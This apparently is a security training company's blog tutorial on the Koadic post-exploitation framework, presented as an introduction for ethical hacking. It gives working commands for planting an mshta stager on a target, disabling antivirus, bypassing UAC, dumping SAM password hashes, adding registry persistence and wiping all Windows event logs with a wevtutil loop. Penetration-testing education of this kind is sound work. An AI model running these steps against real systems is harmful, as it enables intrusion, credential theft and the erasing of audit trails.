Post Exploitation with KOADIC

A successful hack involves five stages:

1. Reconnaisance
2. Scanning
3. Gaining Access
4. Maintaining Access/Persistence
5. Exfiltration

Koadic as a tool can be used in any of the last two stages, an added advantage to the user.

It is a Windows post-exploitation rootkit which can be likened to Meterpreter from the Metasploit framework or Powershell Empire.

Utilizing Windows Script Host (formerly Windows Scripting Host), Koadic provides scripting capabilities similar to batch files but with additional features. It can be used in several Windows environments including Windows 10 owing to this feature.

For evasion of antimalware and antivirus software, Koadic runs in memory therefore significantly reducing generated noise. It secures communications over SSL and TLS by encrypting the communications.

1. Installation

To install Koadic simply run the following command on your terminal to clone the Koadic github repository:

git clone https://github.com/zerosum0x0/koadic.git

Navigate to the directory where the repository was cloned and run Koadic with:

./koadic

The currently available main commands in Koadic are listed below with their functions.

Command Description

edit: shell out to an editor for the current module
listeners: shows info about stagers
sounds: turn sounds off/on: sound(0|1)
help: displays help info for a command
kill: kill a job or all jobs
exit: exits the program
cmdshell: command shell to interact with a zombie
verbose: turn verbosity off/on: verbose (0|1)
creds: shows collected credentials
unset: unsets a variable for the current module
api: turn off/on the rest api
taco: taco time
load: reloads all modules
use: switch to a different module
info: shows the current module options
jobs: shows info about jobs
pyexec: evals some python
domain: shows collected domain information
set: sets a variable for the current module
run: runs the current module
zombies: lists hooked targets

To view these commands use the help command on your terminal as illustrated below.

Post Exploitation with KOADIC

2. Koadic Modules

Koadic has several inbuilt modules with the “stager/js/mshta” being the default configured module on first execution of the tool. To fully configure the module and use it use the “info” command.

On your terminal run:

info

Post Exploitation with KOADIC

This shows all the fields that need to be configured by the user to fully take advantage of the stager and exploit a target machine.

To see all the modules that are available on Koadic type “use” followed by a double tap of the Tab key.

Post Exploitation with KOADIC

The Tab key can be tapped at any point in the use of the tool to autocomplete commands or display the available options of a given command.

In this post I will demonstrate how to use a stager to connect to a Zombie machine, turn off all antivirus software, perform privilege escalation, gather useful information and maintain persistence on the machine then safely exfiltrate. This way you will have a rough idea of the capabilities of this tool and get an introduction to how it is used.

3. Using a Stager

Since Windows defences have gotten better over the years, most stagers are detected and blocked straight up by Windows Defender. For this reason we are going to use the default configured mshta stager because it is the least detectable and works on even some of the latest versions of Windows 10.

To view which parameters we should supply the stager with, run:

info

Post Exploitation with KOADIC

From the illustration above we see that we have to set the SRVHOST and SRVPORT parameters to use the satger. Run the commands below replacing the IP and Port values with your own:

set SRVHOST 192.168.1.7

set SRVPORT 9999

run

On execution Koadic spawns a stager at an address specified in the stager log as shown below.

Post Exploitation with KOADIC

Copy the command generated at the bottom of the log and run it on the target machine.

Post Exploitation with KOADIC

A zombie is immediately created and the target machine is now connected to the mshta stager server.
To confirm this run the command:

zombies

Post Exploitation with KOADIC

All the zombies are displayed and in this case only “Zombie 0” is displayed since it is the only zombie that has been created so far.

4. Killing Antivirus Software

The next step is to kill windows defender and all other running antivirus software. This ensures that any further commands executed on the machine are not blocked.

Performing this is quite simple because luckily Koadic has a module just for that.
Run the following commands:

use implant/manage/killav

info

set zombie 0

Post Exploitation with KOADIC

To confirm that the module was successfully executed, run:

zombies 0

5. Privilege Escalation

One of the most vital steps is privilege escalation which not only allows you full access to the machine as an administrator but also allows you to change critical settings that other users cannot do.

To do this we can try any of the modules available on Koadic to bypass UAC (User Account Control)
The success rate depends on the windows version of your target machine as some may have been patched hence no longer vulnerable to Koadic exploits.

Let’s try implant/elevate/bypassuac_compdefaults with the following commands:

use implant/elevate/bypassuac_compdefaults

info

listeners

set payload 0

run

The “listeners” command lists all the running listeners which are also referred to as payloads. This is the value used to set the payload parameter.

To confirm that the module executed successfully run:

zombies

We see that a new zombie has been created as 1* below . The asterix indicates that the zombie is running with elevated privileges.

Post Exploitation with KOADIC

Type and run:

zombies 1

Details of the zombie are displayed verifying its elevated state.

Post Exploitation with KOADIC

And just like that we are System Admin on the target machine.

At this point we can run any windows commands on the CMD using “implant/manage/exec_cmd”.

This would allow us to perform exfiltration actions on the exploited machine and cover our tracks before we exit.

Let’s give it a try with the following commands:

use implant/manage/exec_cmd

info

set zombie 1

run

The “hostname” command is executed on the target machine returning the name of the machine.

Changing the CMD parameter to “whoami” returns the name of the user we are running as, in this case “user” who is the Admin user as shown below.

Post Exploitation with KOADIC
Post Exploitation with KOADIC

6. Intel raid, Persistence and Exfiltration

One may be interested in collecting any important information from the exploited machine before exiting. For this we are going to use the “implant/gather/hashdump_sam” module.
Run the following commands:

use implant/gather/hashdump_sam

info

set getsyshive true

run

The collected hashes can be seen in the screenshot below.

Post Exploitation with KOADIC

Maintaining persistence on the exploited machine is important as it allows a hacker to create a backdoor into the machine, making latter entrance attempts less cumbersome. They can then access the machine whenever they wish provided they are not discovered.

Let’s use the “implant/persist/registry” module. Run the following commands:

use implant/persist/registry

info

listeners

set payload 0

set zombie 1

run

Post Exploitation with KOADIC

While using this implant, we can set the “CLEANUP” parameter to “true” to remove the registry key thereby hiding out tracks.

For the final exfiltration we can run “for /F “tokens=*” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl “%1″” command using the “implant/manage/exec_cmd” module to clear all event logs. Use the following commands:

use implant/manage/exec_cmd

info

set zombie 1

set CMD for /F “tokens=*” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl “%1”

run

Post Exploitation with KOADIC

We can now comfortably exfiltrate from the exploited machine knowing our hack was a success 🙂

That’s all for an introduction to Koadic. Be responsible with this information and remember to keep your hack ethical.

If you have any question about the blog post, you can contact us.

Ian Kings

How can we help you?

Prisma consultants will be with you, whenever you need. You can contact us 7/24.

Have you seen our practical cyber security trainings?